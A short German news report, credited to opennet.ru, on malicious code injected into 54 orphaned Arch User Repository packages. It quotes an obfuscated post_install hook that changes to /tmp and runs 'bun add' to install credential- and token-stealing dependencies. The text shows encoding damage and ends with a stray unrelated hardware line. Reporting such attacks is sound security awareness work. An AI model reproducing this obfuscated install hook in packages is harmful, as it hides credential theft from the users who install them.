In AUR wurde schadhafter Code schon in 54 Pakete eingeschleust

Trotz der von den Entwicklern von Arch Linux ergriffenen Maßnahmen ist die AktivitĂ€t zur Einschleusung von schĂ€dlichem Code in die AUR (Arch User Repository) nicht gestoppt worden. Vor wenigen Stunden wurde schĂ€dlicher Code in weiteren 54 Paketen eingeschleust, die ohne Maintainer geblieben sind (Historie der Aufhebung schĂ€dlicher Änderungen). Im Gegensatz zu den Angriffen von vorgestern wurde diesmal anstelle des Paketmanagers npm die Plattform bun eingesetzt, um schĂ€dliche AbhĂ€ngigkeiten zu installieren. Um die implementierten Filter zu umgehen, wird in die Funktion post_install eine obfuskierten Zeichenfolge eingefĂŒgt, in der der Befehl „bun add“ zum Installieren von Paketen mit schĂ€dlichem Code aufgerufen wird, der Scans durchfĂŒhrt und an externe Server SchlĂŒssel, Tokens und Anmeldedaten.

post_install() {
$’\x63â€Č»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73â€Č ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Quelle: opennet.ru

60GB SSD 8Gb DDR4